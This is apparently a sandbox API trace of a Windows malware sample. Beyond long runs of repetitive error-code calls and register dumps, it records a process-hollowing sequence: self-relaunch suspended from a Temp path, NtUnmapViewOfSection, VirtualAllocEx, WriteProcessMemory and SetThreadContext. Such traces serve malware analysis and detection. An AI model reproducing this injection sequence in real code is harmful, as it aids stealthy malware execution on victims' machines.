[0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 
[0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 
[0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 
[0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0113.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0114.848] VirtualProtect (in: lpAddress=0x2d34c8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0114.850] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0114.850] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0114.850] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0114.850] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0114.851] GetProcAddress (hModule=0x76910000, 
lpProcName="GetThreadContext") returned 0x76970cc1 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0114.851] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0114.851] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0114.852] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0114.852] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0114.852] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, 
lpParam=0x0) returned 0x6019c [0114.956] PostMessageA (hWnd=0x6019c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0114.956] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0114.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0114.956] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x290000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0114.956] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0114.956] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xde8, dwThreadId=0xdec)) returned 1 [0114.959] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.959] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, 
flProtect=0x4) returned 0x290000 [0114.959] GetThreadContext (in: hThread=0x48, lpContext=0x290000 | out: lpContext=0x290000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, 
[57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, 
[242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, 
[423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.108] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0115.108] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0115.108] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x2d4768*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d4768*, lpNumberOfBytesWritten=0x0) returned 1 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x2d4b68, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0115.109] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x2d4b68*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d4b68*, lpNumberOfBytesWritten=0x0) returned 1 
[0115.117] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x329168*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x329168*, lpNumberOfBytesWritten=0x0) returned 1 [0115.117] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x2d489c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d489c*, lpNumberOfBytesWritten=0x0) returned 1 [0115.118] SetThreadContext (hThread=0x48, lpContext=0x290000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, 
[23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, 